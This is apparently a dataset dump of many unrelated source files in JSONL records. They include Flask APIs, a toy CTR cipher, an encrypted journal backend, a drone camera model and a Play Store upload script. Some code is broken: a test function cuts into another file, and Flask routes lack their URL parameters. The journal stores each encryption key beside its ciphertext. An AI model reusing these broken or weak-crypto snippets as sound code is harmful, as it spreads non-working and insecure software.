return render_template('index.html')\n#\n# @app.route('/post')\n# def post():\n# return render_template('post.html',posts = postAll)\n# @app.route('/post-kondisi')\n# def postKondisi():\n# return render_template('post-kondisi.html',posts = postAllIf)\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"frestea09/workout_flask_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1155951757","text":"import sys, os, math\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport numpy as np\nimport tensorflow as tf\nimport time, timeit\nfrom termcolor import colored\nfrom sklearn.neighbors import NearestNeighbors\nfrom tf_nnquery import build_sphere_neighbor, build_cube_neighbor, build_nearest_neighbor\n\n\ndef check_index(radius, nnsample, database, query):\n B, N = database.shape[0:2]\n M = query.shape[1]\n\n nn_index = []\n nn_dist = []\n nn_count = np.zeros((B*M),dtype=np.int32)\n delta = np.zeros((3,),dtype=np.float32)\n\n for i in range(B):\n for j in range(M):\n cnt = 0\n for k in range(N):\n delta[0] = database[i,k,0] - query[i,j,0]\n delta[1] = database[i,k,1] - query[i,j,1]\n delta[2] = database[i,k,2] - query[i,j,2]\n\n dist = np.linalg.norm(delta)\n if (dist 1:\n geus_with_islands.append(geu.catalog)\n\n if len(geus_with_islands) == 0:\n print('There are no GEUs with islands')\n elif len(geus_with_islands) == 1:\n print('There is', 1, 'GEU with islands:', geus_with_islands)\n else:\n print('There are', len(geus_with_islands), 'geus with islands:', geus_with_islands)\n\n\ndef check_geus_uniqueness(geus_by_id):\n \"\"\"\n Checks if every scope material is assigned to just 1 GEU\n The verification is done by iterating all nodes of the GEUs generated 
with scope material\n This is done so that we know for sure that there are no repetitions\n :param geus_by_id: GEU dict\n :return: Void\n \"\"\"\n\n print(\"Checking GEUs uniqueness...\")\n\n node_list = []\n repetitions = {}\n for geu in geus_by_id.values():\n for node in geu.graph:\n # If it is in the list of nodes, it's repeated\n if node in node_list:\n # If it is the first repetition, add the key\n if node not in repetitions.keys():\n repetitions[node] = []\n # Add repetition\n repetitions[node].append(geu.catalog)\n # If it isn't in the list of nodes, add it\n else:\n node_list.append(node)\n\n # Print accordingly\n if len(repetitions) == 0:\n print(\"No scope material is in two different GEUs\")\n elif len(repetitions) == 1:\n print('There is', 1, 'material that belongs to multiple GEUs:', repetitions)\n else:\n print('There are', len(repetitions), 'materials that belong to multiple GEUs:', repetitions)\n\n\ndef check_geus_strength(geus_by_id):\n \"\"\"\n Checks for weakly connected GEUs\n This is done so that we know if there is any GEU for which we shouldn't assume\n that every material replaces each other\n :param geus_by_id: GEU dict\n :return: Void\n \"\"\"\n\n print(\"Checking GEUs strength...\")\n\n weakly_connected_geus = []\n # Checking for weakly connected GEUs\n for geu in geus_by_id.values():\n if geu.is_strongly_connected is False:\n weakly_connected_geus.append(geu.catalog)\n\n # Print accordingly\n if len(weakly_connected_geus) == 0:\n print('All GEUs are strongly connected')\n elif len(weakly_connected_geus) == 1:\n print('There is', 1, 'weakly connected GEUs:', weakly_connected_geus)\n else:\n print('There are', len(weakly_connected_geus), 'weakly connected GEUs:', weakly_connected_geus)\n\n\ndef check_geus(geus_by_id):\n \"\"\"\n Does in 1 statement all check_geus functions\n :param geus_by_id: GEU dict\n :return: Void\n \"\"\"\n check_geus_uniqueness(geus_by_id)\n check_geus_islands(geus_by_id)\n check_geus_strength(geus_by_id)\n print()\n print('Finished checking GEUs.')\n\n\ndef export_geus_info(geus_by_id: {}, date: dt.datetime, print_on: bool = True):\n # Generating df data\n data = []\n for geu in geus_by_id.values():\n # Making a string that can be used in the df\n catalog_string = ''\n materials_in_geu = len(geu.materials)\n counter = 1\n for mat in geu.materials:\n catalog_string += mat.catalog\n if counter < materials_in_geu:\n catalog_string += ', '\n counter += 1\n\n # Append to data\n data.append([geu.catalog, geu.domain, geu.name, len(geu.materials), catalog_string, geu.is_strongly_connected,\n geu.criticality, str(geu.leadtime) + ' +/- ' + str(geu.leadtime_sd)])\n\n # Making df\n df_export = pd.DataFrame(data, columns=['GEU', 'Dominio', 'Descripción', 'Conteo mat.', 'Materiales', 'Completo',\n 'Criticidad', 'Lead-time'])\n\n file = f'geus_info[{date.date()}].xlsx'\n df_export.to_excel('Outputs/GEUs/' + file)\n","repo_name":"aleroldan95/teco-multi-echelon","sub_path":"nx_graphs.py","file_name":"nx_graphs.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18900052554","text":"\"\"\"\nGiven an m x n binary matrix mat, return the distance of the nearest 0 for each cell.\n\nThe distance between two adjacent cells is 1.\n\n\n\nExample 1:\n\n\nInput: mat = [[0,0,0],[0,1,0],[0,0,0]]\nOutput: [[0,0,0],[0,1,0],[0,0,0]]\nExample 2:\n\n\nInput: mat = [[0,0,0],[0,1,0],[1,1,1]]\nOutput: [[0,0,0],[0,1,0],[1,2,1]]\n\n\nConstraints:\n\nm == mat.length\nn == 
mat[i].length\n1 <= m, n <= 104\n1 <= m * n <= 104\nmat[i][j] is either 0 or 1.\nThere is at least one 0 in mat.\n\"\"\"\nfrom collections import deque\nfrom typing import List\n\n\nclass O1Matrix:\n def updateMatrix(self, mat: List[List[int]]) -> List[List[int]]:\n m, n = len(mat), len(mat[0])\n DIR = [0, 1, 0, -1, 0]\n\n q = deque([])\n for r in range(m):\n for c in range(n):\n if mat[r][c] == 0:\n q.append((r, c))\n else:\n mat[r][c] = -1 # Marked as not processed yet!\n\n while q:\n r, c = q.popleft()\n for i in range(4):\n nr, nc = r + DIR[i], c + DIR[i + 1]\n if nr < 0 or nr == m or nc < 0 or nc == n or mat[nr][nc] != -1: continue\n mat[nr][nc] = mat[r][c] + 1\n q.append((nr, nc))\n return mat","repo_name":"yangmingxuan/pythonalgorithms","sub_path":"arrayandsort/O1Matrix.py","file_name":"O1Matrix.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14422577151","text":"\"\"\" Metadata dict load and dump helpers \"\"\"\n\nimport json\nimport os\n\n\"\"\"Metadata dict manipulation functions\"\"\"\ndef dict_to_file(d, fp):\n \"\"\"Write JSON serializable dict d to filepath fp\"\"\"\n\n with open(fp, 'w') as f:\n json.dump(d, f, sort_keys=False, indent=4)\n\n\ndef data_dict_to_file(d, filepath, template=None, template_path=\"\"):\n \"\"\"Write JSON serializable dicts d and template to filepath and template_path, respectively\"\"\"\n\n dict_to_file(d, filepath)\n\n if template:\n dict_to_file(template, template_path)\n\n\ndef data_dict_to_s3(s3_resource, bucket_name, d, filename):\n \"\"\"Write JSON serializable dict d to filepath on s3_resource \"\"\"\n\n s3_resource.Object(\n bucket_name, d['loc'] + filename\n ).put(ACL='bucket-owner-full-control', Body=json.dumps(d))\n\n\ndef dict_from_file(fp):\n \"\"\"Load JSON serialized dict from filepath fp\"\"\"\n\n with open(fp, 'r') as f:\n return json.load(f)\n\n\ndef data_dict_from_file(filepath):\n \"\"\"Read JSON serialized dict from filepath, loading values from template if applicable\"\"\"\n d = dict_from_file(filepath)\n\n if d.get('template_path'):\n if d['template_path'][0]== '/':\n tfp = d['template_path']\n else:\n tfp = os.path.normpath(\n os.path.join(os.path.dirname(filepath), d['template_path'])\n )\n td = dict_from_file(tfp)\n d = dict(list(td.items()) + list(d.items()))\n\n return d\n\n\ndef data_dict_from_s3(s3_resource, bucket_name, filename):\n \"\"\"Read JSON serializable dict d from filepath on s3_resource \"\"\"\n\n response = s3_resource.Object(\n bucket_name, filename\n ).get()\n return json.loads(response['Body'].read())\n","repo_name":"LiminalSciences/mc10_parser","sub_path":"mc10_parser/dictio.py","file_name":"dictio.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41306248849","text":"from flask import Flask, Response\nimport database_services.RDBService as d_service\nfrom flask_cors import CORS\nimport json\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nfrom application_services.imdb_artists_resource import IMDBArtistResource\nfrom application_services.UsersResource.user_service import UserResource\n\n\napp = Flask(__name__)\nCORS(app)\n\n\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/imdb/artists/')\ndef get_artists_by_prefix(prefix):\n res = IMDBArtistResource.get_by_name_prefix(prefix)\n rsp 
= Response(json.dumps(res), status=200, content_type=\"application/json\")\n return rsp\n\n@app.route('/users/')\ndef get_users_by_prefix(prefix):\n res = UserResource.get_by_user_prefix(prefix)\n rsp = Response(json.dumps(res), status=200, content_type=\"application/json\")\n return rsp\n\n@app.route('/users')\ndef get_users():\n res = UserResource.get_by_template(None)\n rsp = Response(json.dumps(res, default=str), status=200, content_type=\"application/json\")\n return rsp\n\n\n@app.route('////')\ndef get_by_prefix(db_schema, table_name, column_name, prefix):\n res = d_service.RDBService().get_by_prefix(db_schema, table_name, column_name, prefix)\n rsp = Response(json.dumps(res, default=str), status=200, content_type=\"application/json\")\n return rsp\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"yingjinsun/teamproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37088737729","text":"def climbStairs(n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n if n ==1:\n return 1\n if n==2:\n return 2\n s = [1,2]\n s.extend([0 for _ in range(n-2)])\n for i in range(2,n):\n s[i] = s[i-1]+s[i-2]\n\n return s[n-1]\n\n\n\na = climbStairs(4)\nprint(a)\n \n","repo_name":"springlustre/leetcode-execise-python","sub_path":"execise1/70Climbing Stairs.py","file_name":"70Climbing Stairs.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39017346591","text":"from collections import deque\nimport pyqtgraph as pg\n\n# Protocol constants (duplicated because of import problems)\nKEY = 'k'\nVALUE = 'v'\nTIME = 't'\nCUSTOM_DISPLAY = 'custom_display'\n\nDEFAULT_MAX_DATA_SERIES_LENGTH = 1000\n\nview_boxes = {}\n\nclass Display():\n # Override these\n def __init__(self):\n self.title = None\n self.view_box = None\n self.view_box_id = None\n @classmethod\n def accepts_value(cls, value):\n return True\n def add_value(self, message):\n pass\n def init_view_box(self, view_box):\n pass\n def render(self):\n pass\n\n # Shouldn't need to override these ones\n def set_title(self, title):\n self.title = title\n def set_view_box_id(self, view_box_id):\n self.view_box_id = view_box_id\n def render_with_init(self, win):\n if not self.view_box:\n global view_boxes\n if self.view_box_id:\n if self.view_box_id in view_boxes:\n self.view_box = view_boxes[self.view_box_id]\n self.view_box.setTitle(self.view_box_id)\n else:\n win.nextRow()\n self.view_box = win.addPlot(title=self.title)\n view_boxes[self.view_box_id] = self.view_box\n else:\n win.nextRow()\n self.view_box = win.addPlot(title=self.title)\n self.init_view_box(self.view_box)\n self.render()\n\n\n# Built-in stuff below.\n\nnum_plots_in_window = 0\ndef new_row_id():\n global num_plots_in_window\n print('aa', num_plots_in_window)\n num_plots_in_window += 1\n return num_plots_in_window\n\n\nclass TimeseriesPlot(Display):\n def __init__(self):\n super().__init__()\n self.value_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n self.time_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n @classmethod\n def accepts_value(cls, value):\n return is_number(value)\n\n def add_value(self, message):\n self.time_data.append(message[TIME])\n self.value_data.append(float(message[VALUE]))\n\n def init_view_box(self, view_box):\n view_box.showAxis('left', False)\n 
view_box.showAxis('right', True)\n self.curve = view_box.plot()\n def render(self):\n self.curve.setData(self.time_data, self.value_data)\n\nclass XYPlot(Display):\n def __init__(self):\n super().__init__()\n self.x_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n self.y_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n self.vector_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n self.curve = None\n self.curve_point = None\n @classmethod\n def accepts_value(cls, value):\n return is_vector(value)\n\n def add_value(self, message):\n vector = message[VALUE]\n assert is_vector(vector)\n self.x_data.append(vector[0])\n self.y_data.append(vector[1])\n self.vector_data.append(vector)\n\n def init_view_box(self, view_box):\n self.curve = view_box.plot()\n self.curve.setData(self.x_data, self.y_data)\n self.curve_point = pg.CurvePoint(self.curve)\n view_box.addItem(self.curve_point)\n self.point_label = pg.TextItem('[?, ?]', anchor=(0.5, -1.0))\n self.point_label.setParentItem(self.curve_point)\n arrow2 = pg.ArrowItem(angle=90)\n arrow2.setParentItem(self.curve_point)\n\n def render(self):\n index = min(len(self.x_data), len(self.y_data))-1\n self.curve.setData(self.x_data, self.y_data)\n self.curve_point.setIndex(0) # Force a redraw if if the length doesn't change\n self.curve_point.setIndex(index)\n self.point_label.setText('[{}]'.format(\n ', '.join([ '{:0.1f}'.format(val) for val in self.vector_data[index] ])\n ))\n\ndef is_number(s):\n try:\n float(s)\n return True\n except Exception:\n return False\ndef is_vector(vector):\n try:\n assert len(vector) >= 2\n assert is_number(vector[0])\n assert is_number(vector[1])\n return True\n except Exception:\n return False\n\ndefault_display_classes = [\n TimeseriesPlot,\n XYPlot,\n]\n","repo_name":"DomNomNom/quicktracer","sub_path":"quicktracer/displays.py","file_name":"displays.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"39423708747","text":"import Repositorio\r\n\r\nlookupTable = {\"0000\":\"0011\", \"0001\":\"0100\", \"0010\":\"0101\", \"0011\":\"0110\",\r\n \"0100\":\"0111\", \"0101\":\"1001\", \"0110\":\"1101\", \"0111\":\"1111\",\r\n \"1000\":\"1100\", \"1001\":\"1110\", \"1010\":\"1011\", \"1011\":\"1010\",\r\n \"1100\":\"1000\", \"1101\":\"0001\", \"1110\":\"0010\", \"1111\": \"0000\"}\r\n\r\n\r\n# Funciones\r\n\r\n# funcion que realiza el algoritmo CTR\r\ndef obtenerCifrado(M, K):\r\n # varialbles\r\n nonce = \"01\"\r\n contador = \"00\"\r\n _M = M[:4] #bits mas significativos\r\n M_ = M[4:] #bits menos significativos\r\n resultado = \"\"\r\n\r\n # algoritmo en bucle, mientras el contador no se '10' (maximo numero del contador para mensaje de 8 bits)\r\n while contador!=\"10\":\r\n # concatenacion nonce||contador\r\n nonce_contador = nonce + contador\r\n #sumar xor K⊕nonce||contador\r\n suma = Repositorio.sumaXOR(K, nonce_contador)\r\n # busqueda en la tabla de verdad para e cifrado simple\r\n E = lookupTable.get(suma)\r\n if E == None: # si no encuentra el resultado en la tabla\r\n print(\"No se puede cifrar este numero\")\r\n break\r\n else: # si lo encuentra\r\n if contador == \"00\": # opera con _M\r\n resultado += Repositorio.sumaXOR(_M, E)\r\n else: # opera con M_\r\n resultado += Repositorio.sumaXOR(M_, E)\r\n print(\"-Nonce: \", nonce, \"-Contador: \", contador, \"-Bloque E: \", E, \"-Resultado: \", resultado)\r\n # incrementa el contador\r\n contador = sumarContador(contador)\r\n # devuelve el 
mensaje cifrado\r\n print()\r\n print(\"El texto cifrado con CTR es: \", resultado)\r\n\r\n\r\n# suma el contador binario\r\ndef sumarContador(c):\r\n # parsea a entero y suma en 1\r\n contador = int(c) + 1\r\n # parsea a binario y saca los digitos '0b'\r\n contador = bin(contador)[2:]\r\n # verifica que la longitud del contador sea maximo 2 digitos (dos bits)\r\n if len(contador) == 1:\r\n # si el contador es 1, se agrega un 0 delante\r\n contador = str(contador).zfill(2)\r\n elif len(contador) > 2:\r\n # si el contador es mayo a dos digitos, se obtienen los dos primeros\r\n contador = str(contador)[2:]\r\n # retorna el contador\r\n return contador\r\n\r\n\r\n","repo_name":"Chrisnb1/CTR-y-HMAC-algorithm","sub_path":"CTR.py","file_name":"CTR.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13190140110","text":"\"\"\"\nmavsim: camera viewer (for chapter 13)\n - Beard & McLain, PUP, 2012\n - Update history:\n 4/15/2019 - RWB\n 3/31/2022 - RWB\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport parameters.camera_parameters as CAM\nfrom tools.rotations import Euler2Rotation\nfrom message_types.msg_camera import MsgCamera\n\nclass Camera:\n def __init__(self):\n self.target_points = self._getPoints()\n self.pixels = MsgCamera()\n self.projected_points = []\n\n def updateProjectedPoints(self, state, target_position):\n mav_position = np.array([[state.north], [state.east], [-state.altitude]]) # NED coordinates\n # attitude of mav as a rotation matrix R from body to inertial\n R = Euler2Rotation(state.phi, state.theta, state.psi) # R_b^i\n Rgim = Euler2Rotation(0, state.camera_el, state.camera_az) # R_g^b\n Rcam = np.array([[0, 1, 0], [0, 0, 1], [1, 0, 0]]) # R_g^c\n Rtarget = np.eye(3) # R_t^i\n points = self._rotatePoints(self.target_points, Rtarget) # rotate target to inertial frame\n points = self._translatePoints(points, target_position - mav_position) # translate to camera frame\n points = self._rotatePoints(points, Rgim.T @ R.T) # rotate into the gimbal frame\n points = self._rotatePoints(points, Rcam) # rotate into camera frame\n # rotate and translate points defining mav\n self.projected_points = self._projectOnCameraPlane(points)\n # set pixel value as the first projected point\n self.pixels.pixel_x = self.projected_points[0, 0]\n self.pixels.pixel_y = self.projected_points[1, 0]\n\n def getPixels(self):\n return self.pixels\n\n def getProjectedPoints(self):\n return self.projected_points\n\n def _projectOnCameraPlane(self, points):\n m, n = points.shape\n projected_points = np.zeros((2, n))\n for i in range(0, n):\n projected_points[0, i] = CAM.f * points[0, i] / points[2, i]\n projected_points[1, i] = CAM.f * points[1, i] / points[2, i]\n return projected_points\n\n def _rotatePoints(self, points, R):\n \"Rotate points by the rotation matrix R\"\n rotated_points = R @ points\n return rotated_points\n\n def _translatePoints(self, points, translation):\n \"Translate points by the vector translation\"\n translated_points = points + np.dot(translation, np.ones([1, points.shape[1]]))\n return translated_points\n\n def _getPoints(self):\n # Points that define the target, and the colors of the triangular mesh\n length = 100\n # points are in NED coordinates\n # define the points on the target (3D box)\n points = np.array([\n [length / 2, length / 2, 0], # point 0\n [length / 2, -length / 2, 0], # point 1\n [-length / 2, -length / 2, 0], # point 2\n [-length / 2, length / 
2, 0], # point 3\n [length / 2, length / 2, -length], # point 4\n [length / 2, -length / 2, -length], # point 5\n [-length / 2, -length / 2, -length], # point 6\n [-length / 2, length / 2, -length], # point 7\n ]).T\n return points\n","repo_name":"randybeard/mavsim_public","sub_path":"mavsim_python/models/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":294,"dataset":"github-code","pt":"81"} +{"seq_id":"28906618351","text":"\n\ndef merge(intervals):\n # Check if length of intervals is less than or equal to 1\n if(len(intervals) <= 1):\n return intervals\n\n # Sort intervals based on first element of each interval\n intervals.sort(key=lambda x: x[0])\n\n # Create a list of integers to store result\n result = []\n\n # Create newInterval array and assign first interval of intervals to it\n newInterval = intervals[0]\n\n # Add newInterval to result\n result.append(newInterval)\n\n # Iterate through intervals\n for interval in intervals:\n # Check if first element of interval is less than or equal to last element of newInterval\n if(interval[0] <= newInterval[1]):\n # IF true, update last element of newInterval to largest of the two\n newInterval[1] = max(newInterval[1], interval[1])\n # ELSE, assign interval to newInterval and add it to result\n else:\n newInterval = interval\n result.append(newInterval)\n \n # Return result as 2D array of integers\n return result","repo_name":"zofialuther/CS8395-08-Paper1","sub_path":"pseudo_and_code_to_python/problem_23.py","file_name":"problem_23.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8688586598","text":"from django.core.management.base import BaseCommand\r\nfrom django.utils import timezone\r\nfrom django.conf import settings\r\nimport glob, os\r\nfrom apps.formbuilder.models import Form, FormPage, FormElement, FormElementOption\r\n\r\n\r\nclass Command(BaseCommand):\r\n help = 'Cleanup unused objects from form'\r\n\r\n def handle(self, *args, **kwargs):\r\n used_pages = []\r\n forms = Form.objects.filter(date_deleted=None)\r\n for form in forms:\r\n for page in form.pages.all():\r\n if not page in used_pages:\r\n used_pages.append(page.id)\r\n element_count = 0\r\n option_count = 0\r\n page_count = 0\r\n all_pages = FormPage.objects.filter()\r\n for page in all_pages:\r\n if not page.id in used_pages:\r\n if page.elements.exists():\r\n for element in page.elements.all():\r\n if element.options.exists():\r\n for option in element.options.all():\r\n option.delete()\r\n option_count+=1\r\n element.delete()\r\n element_count+=1\r\n page.delete()\r\n page_count+=1\r\n print(str(element_count) + ' element objects deleted')\r\n print(str(option_count) + ' option objects deleted')\r\n print(str(page_count) + ' page objects deleted')\r\n","repo_name":"KCuppens/GenesisV2","sub_path":"apps/formbuilder/management/commands/cleanup_unused_objects.py","file_name":"cleanup_unused_objects.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28156326247","text":"import sqlite3\nfrom flask import Flask, request, jsonify\nfrom datetime import datetime\nfrom cryptography.fernet import Fernet\n\napp = Flask(__name__)\n\n\ndef init_db():\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\n '''CREATE TABLE IF NOT EXISTS journal_entries (id INTEGER PRIMARY 
KEY, encrypted_content TEXT, key TEXT, \n timestamp TEXT, pinned INTEGER DEFAULT 0)''')\n conn.commit()\n conn.close()\n\n\n@app.route('/api/entry', methods=['POST'])\ndef save_entry():\n content = request.json.get('content')\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n key = Fernet.generate_key()\n fernet = Fernet(key)\n encrypted_content = fernet.encrypt(content.encode('utf-8'))\n\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"INSERT INTO journal_entries (encrypted_content, key, timestamp) VALUES (?, ?, ?)\",\n (encrypted_content, key, timestamp))\n conn.commit()\n conn.close()\n\n return jsonify({\"status\": \"success\"})\n\n\n@app.route('/api/entries', methods=['GET'])\ndef get_entries():\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"SELECT * FROM journal_entries\")\n\n entries = []\n for row in c.fetchall():\n id = row[0]\n encrypted_content = row[1]\n key = row[2]\n timestamp = row[3]\n pinned = bool(row[4])\n\n # Decrypt the content using the key\n fernet = Fernet(key)\n content = fernet.decrypt(encrypted_content).decode('utf-8')\n\n entries.append({\n 'id': id,\n 'content': content,\n 'timestamp': timestamp,\n 'pinned': pinned\n })\n\n conn.close()\n\n entries.reverse()\n\n return jsonify(entries)\n\n\n@app.route('/api/entry/', methods=['DELETE'])\ndef delete_entry(entry_id):\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"DELETE FROM journal_entries WHERE id=?\", (entry_id,))\n conn.commit()\n conn.close()\n\n return jsonify({\"status\": \"success\"})\n\n\n@app.route('/api/pin/', methods=['POST'])\ndef pin_entry():\n entry_id = request.json.get('entry_id')\n\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"UPDATE journal_entries SET pinned = 1 WHERE id=?\", (entry_id,))\n conn.commit()\n conn.close()\n\n return jsonify({\"status\": \"success\"})\n\n\n@app.route('/api/unpin/', methods=['POST'])\ndef unpin_entry():\n entry_id = request.json.get('entry_id')\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"UPDATE journal_entries SET pinned = 0 WHERE id=?\", (entry_id,))\n conn.commit()\n conn.close()\n\n return jsonify({\"status\": \"success\"})\n\n\nif __name__ == '__main__':\n init_db()\n app.run(debug=True)\n","repo_name":"ElijahBare/Dayly","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"9089372295","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# vim: ai ts=4 sts=4 et sw=4 nu\n\nfrom __future__ import (unicode_literals, absolute_import,\n division, print_function)\nimport logging\nimport sys\nimport os\nimport json\nimport requests\nimport tempfile\nimport shutil\nimport codecs\nfrom subprocess import call\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\n# check for python version as google client api is broken on py2\nif sys.version_info.major < 3:\n print(\"You must run this script with python3 as \"\n \"Google API Client is broken python2\")\n sys.exit(1)\n\nPLAY_STORE = 'play_store'\nALPHA = 'alpha'\nBETA = 'beta'\nPROD = 'production'\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\nfor handler in logging.root.handlers:\n handler.addFilter(logging.Filter('__main__'))\nCURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\n\n\ndef usage(arg0, exit=None):\n print(\"Usage: {} \".format(arg0))\n 
if exit is not None:\n sys.exit(exit)\n\n\ndef syscall(args, shell=False, with_print=True):\n ''' execute an external command. Use shell=True if using bash specifics '''\n args = args.split()\n if with_print:\n print(u\"-----------\\n\" + u\" \".join(args) + u\"\\n-----------\")\n\n if shell:\n args = ' '.join(args)\n call(args, shell=shell)\n\ndef move_to_current_folder():\n os.chdir(CURRENT_PATH)\n\ndef get_remote_content(url):\n ''' file descriptor from remote file using GET '''\n req = requests.get(url)\n try:\n req.raise_for_status()\n except Exception as e:\n logger.error(\"Failed to load data at `{}`\".format(url))\n logger.exception(e)\n sys.exit(1)\n return StringIO.StringIO(req.text)\n\n\ndef get_local_content(path):\n ''' file descriptor from local file '''\n if not os.path.exists(path) or not os.path.isfile(path):\n logger.error(\"Unable to find JSON file `{}`\".format(path))\n sys.exit(1)\n\n try:\n fd = open(path, 'r')\n except Exception as e:\n logger.error(\"Unable to open file `{}`\".format(path))\n logger.exception(e)\n sys.exit(1)\n return fd\n\n\ndef is_remote_path(path):\n return path.startswith('http:')\n\n\ndef get_local_remote_fd(path):\n ''' file descriptor for a path (either local or remote) '''\n if is_remote_path(path):\n return get_remote_content(path)\n else:\n return get_local_content(path)\n\n\ndef copy_to(src, dst):\n ''' copy source content (local or remote) to local file '''\n local = None\n if is_remote_path(src):\n local = tempfile.NamedTemporaryFile(delete=False)\n download_remote_file(src, local.name)\n src = local.name\n shutil.copy(src, dst)\n if local is not None:\n os.remove(local.name)\n\n\ndef download_remote_file(url, path):\n ''' download url to path '''\n syscall('wget -c -O {path} {url}'.format(path=path, url=url))\n\n\ndef upload_to_play_store(jsdata, channel=None):\n if channel is None:\n channel = BETA\n\n logger.info(\"Starting Google Play Store using {}\".format(channel))\n\n # ensure dependencies are met\n try:\n import httplib2\n from apiclient.discovery import build\n from oauth2client import client\n from oauth2client.service_account import ServiceAccountCredentials\n except ImportError as error:\n logger.error(\"You don't have module {0} installed\".format(error))\n logger.error(\"Missing Google API Client dependency.\\n\"\n \"Please install with: \\n\"\n \"apt-get install libffi-dev libssl-dev python3-pip\\n\"\n \"pip3 install google-api-python-client PyOpenSSL\\n\"\n \"Install from github in case of oauth http errors.\")\n return\n\n if 'GOOGLE_API_KEY' not in os.environ:\n logger.error(\"You need to set the GOOGLE_API_KEY environment variable \"\n \"to use the Google API (using path to google-api.p12)\")\n return\n\n GOOGLE_CLIENT_ID = '107823297044-nhoqv99cpr86vlfcronskirgib2g7tq' \\\n '9@developer.gserviceaccount.com'\n\n service = build('androidpublisher', 'v2')\n scope = 'https://www.googleapis.com/auth/androidpublisher'\n key = os.environ['GOOGLE_API_KEY']\n credentials = ServiceAccountCredentials.from_p12_keyfile(\n GOOGLE_CLIENT_ID,\n key,\n scopes=[scope])\n\n http = httplib2.Http()\n http = credentials.authorize(http)\n\n service = build('androidpublisher', 'v2', http=http)\n\n package_name = jsdata['package']\n version_name = jsdata['version_name']\n apk_file = os.path.join(CURRENT_PATH, 'build', 'outputs', 'apk',\n '{}-{}.apk'.format(package_name, version_name))\n\n json_file_dir = os.path.abspath(os.path.dirname(jspath))\n\n # download remote zim file\n if is_remote_path(jsdata.get('zim_file')):\n zimfile_url = 
jsdata.get('zim_file')\n remote_filename = get_remote_file_name(zimfile_url)\n local_file_path = os.path.join(json_file_dir, remote_filename)\n download_remote_file(zimfile_url, local_file_path)\n jsdata.update({'zim_file': local_file_path})\n\n # update relative paths to absolute\n os.chdir(json_file_dir)\n jsdata.update({'zim_file': os.path.abspath(jsdata.get('zim_file'))})\n move_to_current_folder()\n\n if not jsdata.get('embed_zim', False):\n comp_file = tempfile.NamedTemporaryFile(suffix='.a').name\n copy_to(jsdata['zim_file'], comp_file)\n\n try:\n # another edit request\n edit_request = service.edits().insert(body={},\n packageName=package_name)\n result = edit_request.execute()\n edit_id = result['id']\n\n logger.info(\"Starting Edit `{}`\".format(edit_id))\n\n # upload APK\n logger.info(\"Uploading APK file: {}\".format(apk_file))\n apk_response = service.edits().apks().upload(\n editId=edit_id,\n packageName=package_name,\n media_body=apk_file).execute()\n\n logger.debug(\"APK for version code {} has been uploaded\"\n .format(apk_response['versionCode']))\n\n # release APK into the specified channel\n track_response = service.edits().tracks().update(\n editId=edit_id,\n track=channel,\n packageName=package_name,\n body={'versionCodes': [apk_response['versionCode']]}).execute()\n\n logger.debug(\"Publication set to {} for version code {}\"\n .format(track_response['track'],\n str(track_response['versionCodes'])))\n\n # upload companion file\n if comp_file:\n logger.info(\"Uploading Expansion file: {}\".format(comp_file))\n comp_response = service.edits().expansionfiles().upload(\n 